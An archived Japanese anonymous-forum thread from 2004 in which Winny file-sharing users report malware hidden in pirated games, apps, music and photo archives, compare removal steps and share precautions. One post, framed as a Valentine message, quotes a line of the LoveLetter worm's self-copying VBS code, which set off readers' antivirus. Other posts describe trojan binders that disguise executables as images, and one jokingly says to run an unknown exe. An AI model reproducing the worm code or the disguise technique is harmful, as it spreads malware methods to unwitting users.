>>82
新PC移行作業時の今それにかかったよ
もっかいやり直しだ

133 :[名無し]さん(bin+cue).rar:04/02/10 16:14 ID:Vay7LvbR
久々にwinnyしてたら落としたファイルの中にヌルポハケーン
つーかAVGが捨てろと騒いでたんで、なんじゃこれはとオモタらexeファイルが堂々と
偽装も何も無しで真っ向勝負ですた、物はきちんとあったんで良し!
AVG辺りに捕まるんじゃたいした物じゃないだろけど
MP3なんかの無圧縮アーカイバなんかに仕込んでると知らないでいるヤシ結構いたりして
解凍しなきゃ覗くだけだもんな


134 :[名無し]さん(bin+cue).rar:04/02/10 18:56 ID:fxCfaiM/
前スレ見てないんで既出だったらスマソ
(18禁ゲーム) (040130) Fate/stay night 3discs(ccd+rr5).rar
0168814e986a6ce747eb0c67d071d7ca
2,009,045,380byte
インストールすると、ホントはTM.exeがスタートメニューに登録される筈なんだけど、
インストール先のフォルダに「Fate.exe」が作成され、メニューに登録されます。
で、実行すると、DOS窓一瞬立ち上がって終了。
ちと不審に思ったのでレジストリのシステムの自動実行の箇所を見てみたら
カーネルフォルトチェックなるものが作成されてました、
トレンドマイクロのオンラインスキャンでは引っかからず・・
一応怪しいキーを削除して、
念の為システムの復元を使って、インスコ前まで復元したのだけども不安・・。


135 :[名無し]さん(bin+cue).rar:04/02/10 19:55 ID:HB2B6CQi
>>128
>>129さん
大変亀レスで申しわけないです。
昨夜は自分なりにあれこれ調べ、なにもわからず寝てしまいました。
本当にありがとうです。

136 :[名無し]さん(bin+cue).rar:04/02/11 00:31 ID:f9mc7jsf
age

137 :[名無し]さん(bin+cue).rar:04/02/11 00:50 ID:er7FXgWC
antiny食らっちゃたんですが、ちょっと合点の行かない事がありまして
>>1のHPの削除手順通りにやっていったんですが、TEMPフォルダの中に
「ny.exe」と言うフォルダはありませんでした。
で、オンラインスキャンをしてみたんですが、TEMPフォルダに二つ残ってました
「ファイル名.avi.exe」です。しかしこのファイルはnyのDOWNフォルダの中にあり
拡張子はファイル名.aviでした。これって偽装とかその手の類なんでしょうか?


138 :[名無し]さん(bin+cue).rar:04/02/11 04:26 ID:i7SXfOJp
>>137
ちゃんと拡張子を表示するように設定してるのか?

あと、お前さんの日本語がよくわからないんだが。
Tempフォルダに残っていたと言ってるのに、
しかしDOWNフォルダにありましたって矛盾してないか?
TempフォルダにあったのはEXEファイルの検出されたウィルスで、
DOWNフォルダにはウィルスとは検出されない
ちゃんと見られる動画がありましたで良いのか?

139 :[名無し]さん(bin+cue).rar:04/02/11 04:43 ID:i7SXfOJp
数年前にトロイで遊んでたんだが、binderってのが色々あってな。
例えばEXEファイルのアイコンをjpg画像のにして、
実行するとjpg画像を表示と共に、裏では任意のEXEファイルをTempフォルダか
SystemやWindowのディレクトリにコピーして実行するってのが出来たよ。
アイコンも表向きに表示する物も、裏で実行させるのも全て任意のファイルが選べた。
当時はあんまり検出されなかったな。

まぁそんなわけで、偽装ってのは色々あるんじゃないかと思う。
数年関わってないから今ではどんなのがあるのかは知らない。

140 :[名無し]さん(bin+cue).rar:04/02/11 07:04 ID:anNRogU+
ぬるぽに恥ずかしながらひっかかってしまったんだが
既出の駆除方法を実行したんだが
regeditがつかえなくなって、それはなんとか解決したが
システムの復元が使用不能になってしまいました
システムのプロパティで復元を不能にするのチェックをはずしても
利用可能なドライブを有効にするタブが選択できないようになってしまった。
そのままOKを押すと一つ以上のドライブが選択されていません・・・・・
とエラーが出てしまう。
解決方法おねがいします。
クリーンインストしたほうがいいのかな
めんどくせぇぇー




141 :[名無し]さん(bin+cue).rar:04/02/11 07:51 ID:1tdHP7UL
セーフモードでやれ

142 :[名無し]さん(bin+cue).rar:04/02/11 10:52 ID:YhXGsq/T
>>101
79だけど、zoneの卒業って曲が流れてるのは
全て新種ウィルスだと思います。
mp3をスキャンしてみると、トレンドマイクロで引っ掛かって、
嘘だろー、と思い、開いてみたら感染してました。

143 :[名無し]さん(bin+cue).rar:04/02/11 11:06 ID:YhXGsq/T
亀レスですません

>>81
シマンテックに報告する前に、nyやってることバレたらどうしましょう?
「何をしていてそうなったのですか?」と理由聞かれると思いますが

>>83
捏造かな。分かんないけど

>>93
確かそんなウィルスだった気がする。

>>95
mp3 開いても感染しないものとするものがあるよ。
mp3 -詳細見てみたら、アプリケーションって書いてあった。
でもmp3 のアイコンはWMPになってたし



144 :[名無し]さん(bin+cue).rar:04/02/11 11:10 ID:YhXGsq/T
>>85
zone 卒業 流れてたものは全てバックドアが仕込まれてる。

ところで聞きたいのですが、.mp3 .jpg 9152バイト のファイルが
幾つも流れてるのですが、あれはウィルスなのですか?

145 :[名無し]さん(bin+cue).rar:04/02/11 14:01 ID:HYkV0DQ6
>>144
それ赤い服着たキモヲタが写ってるやつね
ウィルス入り要注意

146 :[名無し]さん(bin+cue).rar:04/02/11 14:06 ID:6h0s1rHG
ログ情報にアップフォルダ読み込み失敗と出るのだが
ウイルスでつか?それとも
なにかたりないのかな?(´・ω・`)

147 :[名無し]さん(bin+cue).rar:04/02/11 14:08 ID:HYkV0DQ6
すいません、あとウィルス入りファイルのキャッシュはいつまでも持ってないで直ぐに消して下さいね
じゃないと拡散してみんなの迷惑になりますから

148 :[名無し]さん(bin+cue).rar:04/02/11 15:17 ID:XxZoPxs9
>>146
7.1のバグ
手書きで設定してねん

149 :[名無し]さん(bin+cue).rar:04/02/11 16:21 ID:9QuWTF2H
なんか急にポート警告が多くなった というか検索リンクなどに繋がりにくくなった
winnyフォルダに(null)Noderefと(null)BbsNoderefっつーのがあるんだけどこれが原因かな
なんど削除してもwinny.exeを起動すると勝手に作成されるんだよ




150 :[名無し]さん(bin+cue).rar:04/02/11 17:44 ID:dRqs3Z+l
ぬるぽ

151 :[名無し]さん(bin+cue).rar:04/02/11 20:11 ID:dLPzYpIE
>>150
ガッ!


152 :[名無し]さん(bin+cue).rar:04/02/11 20:12 ID:fQmDMWHO
>>151

153 :[名無し]さん(bin+cue).rar:04/02/11 22:42 ID:1zA53X3q
>>147
大丈夫
キャッシュといっしょにワームも消滅したから
もちデータも

154 :146:04/02/11 23:04 ID:6h0s1rHG
>>148
手書きで設定ってどうやれば
いいのでしょう><

155 :[名無し]さん(bin+cue).rar:04/02/11 23:08 ID:fQmDMWHO
>>154
先にお礼を貰おうか

156 :[名無し]さん(bin+cue).rar:04/02/11 23:10 ID:UilT+7ip
>154
それができないなら、バージョンを下げればよかろう。

157 :[名無し]さん(bin+cue).rar:04/02/11 23:20 ID:MhJGmK8j
>>156
よかろう。

なんか爺さんみたいな口調だね

158 :[名無し]さん(bin+cue).rar:04/02/11 23:36 ID:6TUtN4Ou
●「モジュール 'kernel32.dll' のアドレス ******** で
 アドレス ******** に対する読み込み違反がおきました。」
 と出てUPフォルダの追加やキャッシュフォルダ等の変更が出来ません。どうすればいいですか?
 →β7.1のバグで、「参照」を使うとWinnyが落ちます。
  直接、パス(ex. D:\UP\)を入力すれば回避できます。もしくは、UpFolder.txtを開いてパスを編集してください。

159 :[名無し]さん(bin+cue).rar:04/02/12 00:08 ID:c7SHPGwG
>>158
で何か?

160 :[名無し]さん(bin+cue).rar:04/02/12 01:33 ID:+j0g1A1e
結局ウイルスというよりも、単なる悪質イタズラexeだったと。

161 :154:04/02/12 12:07 ID:+/gXUWs2
>>156
バージョン下げても出る(´・ω・`)

162 :[名無し]さん(bin+cue).rar:04/02/12 13:02 ID:jDHRwqzG
1の通りやったけどキャッシュが消える・・・どうしたらいいんだ・・・

163 :[名無し]さん(bin+cue).rar:04/02/12 13:40 ID:m9A1vU7/
>>146
ログ情報にアップフォルダ読み込み失敗と出るのだが

うp用のフォルダは、自分で作って登録する必要がある。

164 :[名無し]さん(bin+cue).rar:04/02/12 15:45 ID:TF0BjX8D
Antinnyを削除しようと思い、Program Files検索してexeを削除しようとしたんですが
一つだけエラーが出て削除出来ないファイルがあるんです・・・。
エラー内容は、アクセス出来ません。送り側のファイルが使用中な可能性があります と。
これは、どうしたら良いんでしょうか。教えて頂きたいのです・・・。


165 :[名無し]さん(bin+cue).rar:04/02/12 15:57 ID:jHdaexwi
レジストリーの更新ポイントに入っているようなのですが削除は
どうすればいいのでしょう。OSはウィンドウズXPです。

166 :[名無し]さん(bin+cue).rar:04/02/12 16:43 ID:ybJ6nMO2
>>82
何やっても無理だった
完全に消されてるね

167 :[名無し]さん(bin+cue).rar:04/02/12 18:35 ID:thwN2c9I
ZONEの卒業・・・全部・・・気をつけろ!
とくにジャケット写真特典付ってヤツ(中身はウイルスと邦楽のわけわからんmp3だ)
ノートン先生が脅威を発見してくれて
助かったw

168 :[名無し]さん(bin+cue).rar:04/02/12 19:15 ID:08z9evDt
exe方式よりもccd、imgなどの方が怖いのはアプリ厨だけでしょうか。
フォーマットしたい人にはお勧めだけど。

169 :[名無し]さん(bin+cue).rar:04/02/12 20:36 ID:Z/Td+lZk
>>168
俺もアプリのccdでHDD全消しやられたんで、その気持ち
分かります。ま、自分の危険に対する意識の低さを痛感
したし、おかげでいろいろ勉強になったし、今はひっかかって
よかったかな、ぐらいに思えてます。最初は青くなったけど・・・。

170 :[名無し]さん(bin+cue).rar:04/02/12 20:43 ID:iljv/wAk
>>167
良く分からんが、全てボツですか。
ZONEの卒業とるの諦めた方がいいですよ

171 :[名無し]さん(bin+cue).rar:04/02/12 21:07 ID:Y1O2uZx8
なんか特定のキャッシュだけ消えるンですけど。

ぬるぽでキャッシュ消えたー

とりあえずぬるぽ掃除

復元でキャッシュ復活。フォルダにぶち込む

Winny起動

あれ?なんかキャッシュ一部消えてる?

復元でキャッシュ復(ry



172 :[名無し]さん(bin+cue).rar:04/02/12 21:18 ID:hiCdCD+F
>>145

 偽贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋
 ※贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋
  :贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋感
?※贋贋贋贋贋贋謎贋贋贋消±*謎贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋俺
染  ×±?×:撒散撒※※:: ::×消誰散贋贋贋贋贋贋贋贋贋贋贋贋贋贋贋
戯※?×・*撒危偽散※去?×染※贋贋俺贋贋贋贋贋贋贋贋贋贋贋贋贋贋撒
※*・: ×※撒撒※危撒撒×±去染戯撒去撒俺謎俺感謎贋贋贋贋贋贋贋贋拡
:*※×*去*撒?*贋贋去×±*去染※撒俺偽偽偽偽贋贋贋贋贋贋贋贋贋
 :染*  :×※: ±去偽去×  ×・**謎染危染拡消撒贋贋贋贋贋贋贋贋贋
  ・?: ×去? ±*※危*:   :::±偽去去危危危消贋贋贋贋贋贋贋贋贋
 ?※去消危・  ・*※去去拡消染危偽偽去去去危危危感贋贋贋贋贋贋贋贋贋
  ※±±:::   ・*去*去?:※偽危去※危偽偽偽偽偽散撒謎撒贋撒撒贋贋
  **    ×※偽危*偽消:     ?※去偽感感俺感偽偽拡消拡偽撒贋贋
   去   :謎贋贋贋贋贋撒±::    ?※危偽偽感感偽偽危危消偽撒贋危
   ※:   ×*消染危偽※:      ?※去染拡偽偽偽偽消偽謎謎贋撒
   ±?     ×:×*※±×    ×※去危危消偽偽偽偽俺贋贋贋±
    去        ・*※※※?   ×※去危偽偽感俺感感謎撒贋偽
    去: ×危贋贋贋贋贋撒撒危: ×*去危消偽謎散散散謎蟲蟲撒※
     去×危撒贋贋贋贋贋贋謎±× / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     去±  ×・?±※感消±:× <  漏れの事か?
      消? ×*去偽誰偽±:×* \____________
       偽:::×危俺偽去*・・*※染謎蟲撒贋贋贋贋贋
       ※±   :×:::×±*※偽撒撒贋贋贋贋贋
        危         ×±※俺贋贋贋贋贋贋
        *?      ×・*去誰贋贋贋贋
         去:× ×±※去消撒贋贋贋
         去撒拡危戯撒撒贋贋


173 :146:04/02/12 22:14 ID:+/gXUWs2
>>163
サンクス
解決しスタン

174 :[名無し]さん(bin+cue).rar:04/02/12 22:50 ID:9GOHKtch
起動したら壁紙がぬるぽになってて、使用者が

山崎渉
京都府警察ハイテク犯罪対策室

になってたんだけどこれって既出?


175 :[名無し]さん(bin+cue).rar:04/02/13 00:05 ID:IuGJJrUF
>>174
???

176 :[名無し]さん(bin+cue).rar:04/02/13 01:49 ID:yzBw0Y8o
ccd で ntローダーが消えた。。。。
あわわわわ。

177 :176:04/02/13 03:01 ID:xuh1f7r7
再インスコ 完了。
フォルダのみ残り、最重要エロDATAはすべてあぼーん。
参った。

178 :[名無し]さん(bin+cue).rar:04/02/13 03:07 ID:UAEa3rqZ
最重要エロDATA
プッ

まぁマジレス。ファイナルデータみたいなので復旧可能なファイルもあるぞ。
勿論FreeSoftでもある。
あとはHDバックアップソフトでも買っておけ。

179 :[名無し]さん(bin+cue).rar:04/02/13 04:03 ID:x0xi18/w
>>177
>178は何も分かっていないので無視するように。

180 :[名無し]さん(bin+cue).rar:04/02/13 07:27 ID:/S+EzmK5
>>133はどういう意味?

181 :[名無し]さん(bin+cue).rar:04/02/13 08:17 ID:dwIUmJFf
>>180
へっ?どの辺が分からないの?

182 :[名無し]さん(bin+cue).rar:04/02/13 08:55 ID:0nJDFFid
しまった。【アルバム】 オリコン [2004.02.08] 20位まで by aco の
10位くらいに、ZONEの「卒業」本物が入ってますが、
最後の方のラジオ方法FMウザイ。
確認しずにCD-Rにコピーしてしまった。
鬱...

183 :[名無し]さん(bin+cue).rar:04/02/13 08:57 ID:0nJDFFid
182に付け足し
ラジオFMが入ってるヤシはウイルスと同様。(実際ウイルスじゃなかったけど
これじゃ歌詞覚えられないよ

184 :[名無し]さん(bin+cue).rar:04/02/13 11:30 ID:np1YZPr9
>>180
無圧縮でなくてもMP3なんかだとCD焼きしないヤシは解凍もしないだろ?
ヌルポがあっても関係ないのよ実行できないんだから

185 :[名無し]さん(bin+cue).rar:04/02/13 14:22 ID:bsI1BWrj
初めてウイルス感染ファイルを落としたので教えてください。

物はzipで圧縮された写真集です。ノートンでチェックしたら
「W32.HLLW.Antinny」に感染していることが判明したんです。
それで、そのzipファイルをWinRARから開いてみると
「xxx.exe」というファイルがあるのを確認できたので、
「xxx.exe」だけを削除しました。残りはjpgファイルだけになりました。
これでこのzipファイルは晴れて安全になったんでしょうか?

186 :[名無し]さん(bin+cue).rar:04/02/13 14:44 ID:e70nFN5X
感染ではなく同梱と思った方がいいよ。
.exeならば実行しなければ大丈夫。削除したとあるのでいいと思う。
もし感染しても自分がしていたことを思い返せば全てが自己責任だったことに
気がつきます。

187 :[名無し]さん(bin+cue).rar:04/02/13 14:53 ID:2CkIplAi
XP Home ny2.71にて。
今朝気づいたことなんだけど、
nyのUPフォルダが勝手に2コ追加されてて、
(一つはMy Documents and Setting Folder、
もう一つはCドライブのwindows直下に
SystemDll
っていうフォルダができてた。)
SystemDllフォルダの中には
(ハッシュ)カードキャプター〜〜.exe
みたいな12コのexeファイル(アイコンはテキストファイル、落した覚えなし)ができてたんだけど
これ何?

最新定義したノートン先生は「無問題だハゲ!!!」と言い張ってます。
ちなみにキャッシュが消されていたり、ネットにつなげなくなったり、何かエラーが出たりはしてません。

果てしなくバックドアっぽいんですが・・・

188 :185:04/02/13 15:12 ID:bsI1BWrj
>>186
レスありがとうございます。
ふざけたレスには感じませんでした。

189 :[名無し]さん(bin+cue).rar:04/02/13 19:03 ID:jHyZMTdl
ccd をマウントしたら、hdd がフル回転。
クイックランチが消え、デスクトップのアイコンが
ひとつづつ、消えて逝く。

タスクマネージャで何が動いているか
確認するもプロセスまでは気が回らなかった。

7年間鉄壁のセキュリティーを保ってきた私が敗北した瞬間だった。
再インスコ後も、msブラスターで弄ばれ、
プライドは崩壊。

初めて無力感を感じた夜に。

190 :[名無し]さん(bin+cue).rar:04/02/13 19:41 ID:USRcd5QR
>>189
ご愁傷様。CDのオートランも切らないで

7 年 間 鉄 壁 の セ キ ュ リ テ ィ ー

とか言ってるのが笑える。

191 :[名無し]さん(bin+cue).rar:04/02/13 19:45 ID:83oB7hQy
僕の7年間鉄壁のセキュリティーを保ってきた肛門も崩壊しそうです

192 :[名無し]さん(bin+cue).rar:04/02/13 19:49 ID:QGh381t9
賢者は他人のミスから学び
愚者は自分のミスから学ぶ

昔の人は好い諺を作ったものですねw

193 :[名無し]さん(bin+cue).rar:04/02/14 00:36 ID:n6xFoZQZ
>>192 感動した!

194 :[名無し]さん(bin+cue).rar:04/02/14 01:58 ID:DvQFkfaa
>>187
落として実行しないと感染しない。
nyが起動してない状態で、UpFolder.txtに登録されたフォルダと、マイドキュメントのDownフォルダ(テキストのexeが入ってる)を削除して、UpFolder.txtも削除。

195 :[名無し]さん(bin+cue).rar:04/02/14 02:03 ID:5fXiREYS
>>82
(アプリ)ATOK17(ccd+rr3%)シリアル付.rar 53,080,912 333701088078b262a6e35d82082feb91
これを踏んでしまってHDからファイルが消えてしまったのですが、これって物理フォーマットされてるんでしょうか?
ファイナルデータで復旧可能でしょうか?

ATOKに目がくらんで踏んでしまったこのアプリ…
カリカリカリカリいい音を立ててファイルが消えていってしまった。
後には何も残さずに。。。

ファイナルデータでも書き換えられたファイルは絶対復元できない。
わずかに被害を免れたファイルだけは戻ってきた。
それでよしとしなくてはならないのか…
嗚呼!

196 :[名無し]さん(bin+cue).rar:04/02/14 02:41 ID:mYTtg6dS
Autorun切ろうぜ、おい

197 :[名無し]さん(bin+cue).rar:04/02/14 02:50 ID:tLuEJYz6
>>195
これでやられた。漏れも。
多くは語るまい。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

.   /:;:;:;:;:;:;:;:;:;:;:;:;:,.,.、
   /:;:;:;:;:;:;:;i`` '''''''''ヾ;' 
.  /;:;:;:;:;:;:;:;:;|   、 ;`:    最後に私からみなさんにメッセージを贈りたいと思います。
 /;:; -、;:;:i'''´  ;;.,,.,.; ;.,,!   人は歩みを止めた時に、そして挑戦を諦めた時に年老いてゆくのだと思います。
 i;:;:i£`;;!.   ,-=・、く=i'    この道を行けばどうなるものか。
 |;:;:ヽ.^' .    '´;.. ヾ.    危ぶむなかれ、危ぶめば道はなし。
 !;;:;''`i      ノ''ー-ノ    踏み出せばその一足が道となり、その一足が道となる。
..,i;;''  、  .  i´.(ー‐‐!    迷わず行けよ、行けばわかるさ。ありがとう!!
ヘ、   ヽ    ヽ  ̄.|     いくぞー!! 1・2・3 ダー!!
 ..`ー-、  ` ー-、    i
  `: ... `ー--、./` ー-‐'
    ` : ....  iヾ、


198 :[名無し]さん(bin+cue).rar:04/02/14 05:22 ID:eaO/4AcF
>>184
mp3って解凍できるんですか?

199 :[名無し]さん(bin+cue).rar:04/02/14 05:28 ID:2uk4LgsW
http://pc2.2ch.net/test/read.cgi/pcqa/1076671439/516-519

516 名前:ひよこ名無しさん[] 投稿日:04/02/14 05:11 ID:eY2iPY7A
mp3て解凍できるんですか?

517 名前:ひよこ名無しさん[sage] 投稿日:04/02/14 05:12 ID:???
ムリ

518 名前:ひよこ名無しさん[sage] 投稿日:04/02/14 05:12 ID:???
できません

519 名前:ひよこ名無しさん[sage] 投稿日:04/02/14 05:13 ID:???
>>516
解凍したらwaveになっちゃうよ。

200 :[名無し]さん(bin+cue).rar:04/02/14 05:58 ID:DRNkH6Dw
(パイパン写真集) 天使ちゃん画像館 2004年01月26日 紋舞らん・小倉ありす・古都ひかる・沢口あすか・伊東怜・萩原舞.zip
ワーム入りです

201 :187:04/02/14 08:04 ID:5TDUTuLf
>>194
情報サンクス
指示どうり削除しました

202 :[名無し]さん(bin+cue).rar:04/02/14 10:17 ID:sei3HQK7
# ( アプリ) DivXPro5.1+認証解除+日本語化クラックパッチ 最新コーデック cracked[アニメ映画ToolツールAppPCゲームcodec].zip

これ実行したらHDDのデータ全部消されました。・゚・(ノД`)・゚・。
ファイナルデータ使おうと思ったらアプリも全部消えてますた
OS再インスコしたよ・・・・・ヽ(`Д´)ノウワァァン!!

203 :[名無し]さん(bin+cue).rar:04/02/14 11:04 ID:eZDIu039
”放課後〜濡れた制服〜”
最近発売したソフトらしいのですが、これの1100Mくらいのファイルで
やられました。HDD消されてしまいましたデス。
ゲームのインスコまでは問題なく、スタートアップのショートカットで
実行しようとしたらHDD消去開始って感じ。
とっさに止めたものの、ny関連のトコが消えてしまったのでファイル名や
サイズの詳細をかけなくてスマソ。OSから入れなおしだよ、ママン

204 :[名無し]さん(bin+cue).rar:04/02/14 11:38 ID:XdGDEUwa
>>198
mp3でも曲が繋がってるものなら解凍できます

205 :[名無し]さん(bin+cue).rar:04/02/14 11:50 ID:MaGE2Epr
余にも情報不足で申し訳ないのですが
ウィルス発見次第。コノヤロと消してしまったので…
覚えている限り情報を
既出だったらすみません。
Adobe Illustrator CSの
150M前後のファイルには全てSetup.exeにBKDR_SUB7.22Aが
生息していらっしゃいました。

約350MBの(アプリ) Adobe Illustrator CS 日本語版 (尻+crack付).rar.
lzh,,0,0,595f8574c07055e9c685e59b45366e6c,1
は無事インスト可能だったかと思います。
[アプリ] Adobe Photoshop CS 日本語版(Serial・Crack付).rar
【アプリ】Adobe Photoshop CS (Ver8.0)(シリアル付インストール確認済).zip
これらは無事でした…なぜイラレにだけくっついていたのか謎…
ちなみに感染はしてませんでした。デーモンが動き出した瞬間。バスターが起動したので…

皆さんご注意あれ

206 :[名無し]さん(bin+cue).rar:04/02/14 12:31 ID:H/zwj+N+
>>195
> (アプリ)ATOK17(ccd+rr3%)シリアル付.rar 53,080,912 333701088078b262a6e35d82082feb91
> これを踏んでしまってHDからファイルが消えてしまったのですが、これって物理フォーマットされてるんでしょうか?

ご愁傷様。情報不足だったんだね。
で、これは本物?
[NEW][アプリ]Justsystem_ATOK17 for Windows 40,927,985 byte

207 :[名無し]さん(bin+cue).rar:04/02/14 12:32 ID:22vHjmHU
よく見かける651264b exeファイルを実行させるとどうなるの?

208 :[名無し]さん(bin+cue).rar:04/02/14 13:05 ID:TwPPHsP3
>>207
試せば分かるよ

209 :[名無し]さん(bin+cue).rar:04/02/14 14:19 ID:n6xFoZQZ
>>207
アンチウィルスソフト入れてる?

210 :[名無し]さん(bin+cue).rar:04/02/14 14:50 ID:s3SP+F3a
ccdやiso形式のファイルをGETして使用する時に注意することを教えてください。
自分で考え付くのは、
1・なるべく被参照量の多いファイルを落とす。
2・新作には手を出さない。
3・Winny File Databaseとかで確認する。
4・インストール前にccdをノートンでチェックする。←意味ありますか?
他に何か重要なことはありますか?
実験用PCがあればいいんですが、PCは1台しかありません。

211 :[名無し]さん(bin+cue).rar:04/02/14 15:04 ID:ZlTEBHCR
>>210
はぁ?

212 :[名無し]さん(bin+cue).rar:04/02/14 15:05 ID:GOb/bSuQ
>>210
4は意味ない。
CCDをdaemonでマウントして(もちろんautorunはきっておく)
なかの実行ファイル(setup.exe)をノートンでチェックする。
タイムスタンプを確認してみる。発売日後だったらあやしい。(タイムスタンプをいじってる場合もあり)
できたら仮想マシン上で動かすのがいいかな。

こんだけやっても引っかかる時は引っかかるけどね。

213 :[名無し]さん(bin+cue).rar:04/02/14 15:05 ID:aKPYuPiQ
WinNT系で感染してHDDがあぼーんするのに
Win9X系ではまったく反応がないというようなウイルスは
あるんでしょうか?
実験用PCに98SEを入れていてふと気になったのですが…。
(メインは2000)

214 :[名無し]さん(bin+cue).rar:04/02/14 15:07 ID:ZlTEBHCR
>>213
16bitト32bitだからある

215 :[名無し]さん(bin+cue).rar:04/02/14 15:19 ID:C90e/UAC
>>210
VirtualPCで試せ。
あと、事前にバックアップとれ。

216 :210:04/02/14 15:46 ID:s3SP+F3a
>>212
>>215
レスありがとうございます。参考になりました。

「仮想マシン上で動かす」っていうのは知らなかったんで調べてみます。
あと、マウント後に「setup.exe」のチェックを実行したことがありませんでした。(知らなかった)
今までは、だだ単にccdをノートンでチェックして大丈夫だったら、
普通にそのままセットアップウィザードに従ってインストしてました。
今手持ちのccdで試した所、マイコンピュータから仮想DVDドライブを開けば、
ccdの中身を見ることができたんですね。

217 :[名無し]さん(bin+cue).rar:04/02/14 15:58 ID:0loxXNsG
みなさん、Winny File Databaseへの登録も御願いしますよ。

ttp://nydb.info/

218 :[名無し]さん(bin+cue).rar:04/02/14 16:04 ID:we9oIUrv
データーベースを過信するべからず
捏造登録する香具師いるぞ

219 :[名無し]さん(bin+cue).rar:04/02/14 16:12 ID:915Y1Y8h
HDD全消し食らいました。
これなんて言うウイルス?

220 :[名無し]さん(bin+cue).rar:04/02/14 16:16 ID:GOb/bSuQ
俺、風邪ひきました。
これなんて言うウイルス?

221 :[名無し]さん(bin+cue).rar:04/02/14 16:17 ID:Nmouia/B
>>219
鳥インフルエンザ

>>220
鳥インフルエンザ

222 :[名無し]さん(bin+cue).rar:04/02/14 16:18 ID:+RvBNLo0
ビスケたん.zipファイルスキャンしたらANTINNYを発見。
ウィルス駆除実行したけれど
駆除できなかったので、とりあえず隔離。ウィルスを駆除できたら
これ開いて大丈夫でしょうか?

223 :[名無し]さん(bin+cue).rar:04/02/14 16:25 ID:/AlvJiAC
>>221
二つとも同じかよ。もうちょい捻ってくれれば笑えたのに。

224 :[名無し]さん(bin+cue).rar:04/02/14 16:26 ID:n6xFoZQZ
>>222
大丈夫.
ファイルスキャンするまでもなく,解凍すれば自動で除去してくれる.

225 :[名無し]さん(bin+cue).rar:04/02/14 16:33 ID:+RvBNLo0
>>224
【守銭奴ねこまた】(雑誌)ネットランナー特別企画本 Winny娘。(ビスケたん).zip
ですが、ウィルス定義ファイル最新で駆除しようとしても駆除できないんですが、
マカフィーは解凍するとちゃんと駆除してくれるんですか?

226 :[名無し]さん(bin+cue).rar:04/02/14 16:44 ID:n6xFoZQZ
>>225
解凍しても実行しなければいいのよ.

それを踏まえて自動駆除してくれないのなら,
手動で削除すればよし.

227 :[名無し]さん(bin+cue).rar:04/02/14 16:48 ID:+RvBNLo0
>>226
サンクス

228 :[名無し]さん(bin+cue).rar:04/02/14 16:54 ID:qomaqb+r
>>225
ソフトによって「駆除」の定義が違う。バスター風に言うと、Antinyは単体ファイルだから、
「駆除」はできない。隔離して削除する処理になる。
ノートン風に言えば、バスターと同じ処理をしているのに、ノートンではそれも「駆除」

つーかここに来る前に、ウィルス対策ソフトのメーカーサイトで、データベースを見る
ぐらいのことはしてこい。


229 :[名無し]さん(bin+cue).rar:04/02/14 16:58 ID:Nmouia/B
オレ的には問答無用で消してくれるノートンの方が安心

230 :[名無し]さん(bin+cue).rar:04/02/14 17:00 ID:we9oIUrv
バレンタインデーに愛を込めて&#9829

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs

231 :[名無し]さん(bin+cue).rar:04/02/14 17:26 ID:W4wnrIM2
たまにアイコンが真っ白なexeが入っていてオートランが組まれているイメージファイルを見かけるのだが…。

232 :[名無し]さん(bin+cue).rar:04/02/14 17:50 ID:sei3HQK7
>>203
[18禁ゲーム](040213)放課後 〜濡れた制服〜 Disc1+2(α補修済)ccd+rr5%.rar 25d423b1512d920b932cb61481195463

これか?

233 :[名無し]さん(bin+cue).rar:04/02/14 18:26 ID:az3MHFhe
ブリトニーのアルバム落として解凍してたら
AVGがウィルス発見!となりました。
anntinyだったんですが解凍フォルダにあるexeを触らなければ
感染しないんでしょうか?


234 :[名無し]さん(bin+cue).rar:04/02/14 18:35 ID:tIHyFUlb
そのファイルを実行しない限り感染はしないだろう。
WinRARか解凍レンジなどのソフトでその実行ファイルのみを消したらOK。

ここで皆に聞きたいんですが、此間「Whiter」というウィルスにやられました。
イメージファイルの中に入っていたらしくデーモンでマウントしたらやられました。
こういう場合の駆除はどうしたらいいんですか?
それとこのウィルスはAVGで検出する事ができないんでしょうか?
やっぱウィルス検証用のPCでも作って調べない限り無理かな。

235 :[名無し]さん(bin+cue).rar:04/02/14 18:39 ID:n6xFoZQZ
>>234
http://www.google.co.jp/search?sourceid=navclient&hl=ja&ie=UTF-8&oe=UTF-8&q=%E3%82%A6%E3%82%A3%E3%83%AB%E3%82%B9+Whiter

236 :[名無し]さん(bin+cue).rar:04/02/14 19:13 ID:FF/FTIVA
今ここきたらNortonが反応しますが

237 :[名無し]さん(bin+cue).rar:04/02/14 19:18 ID:xH8G29yy
>>236
自PCのウイルスチェックしてみ

238 :[名無し]さん(bin+cue).rar:04/02/14 19:25 ID:n6xFoZQZ
>>236
LoveLetterがどっかに貼られてるに3000ガウス

239 :[名無し]さん(bin+cue).rar:04/02/14 19:51 ID:V+96htFO
こっちじゃね
[18禁ゲーム](040213)放課後 〜濡れた制服〜 Disc1+2(α補修+NOCD化済)ccd+rr5%.rar
4370fdc6c7a8cc58bda97c0cced596a2
サイズ1,114,076,713

240 :[名無し]さん(bin+cue).rar:04/02/14 20:18 ID:sei3HQK7
おれも反応する。
他のスレは大丈夫だが

241 :[名無し]さん(bin+cue).rar:04/02/14 20:18 ID:FF/FTIVA
検疫できませんだって。新種なんじゃない。

242 :[名無し]さん(bin+cue).rar:04/02/14 21:00 ID:/AlvJiAC
>>238、3000ガウス獲得おめでとう!

230の we9oIUrv って人から、みんなにバレンタインのラブレターだったらしい。

243 :[名無し]さん(bin+cue).rar:04/02/14 21:01 ID:49dbLB5o
>>242
みんなにじゃなく、ノートンユーザー限定だが。


244 :[名無し]さん(bin+cue).rar:04/02/14 21:03 ID:v/680aYA
みんな同じだな。

俺もノートン先生がLoveLetter反応して検疫出来ないと言ってくる
LoveLetterごときをなんで検疫出来ないかと、小一時間。

新種!?? そんな、まさか

245 :[名無し]さん(bin+cue).rar:04/02/14 21:07 ID:k9JRwSkE
>>230

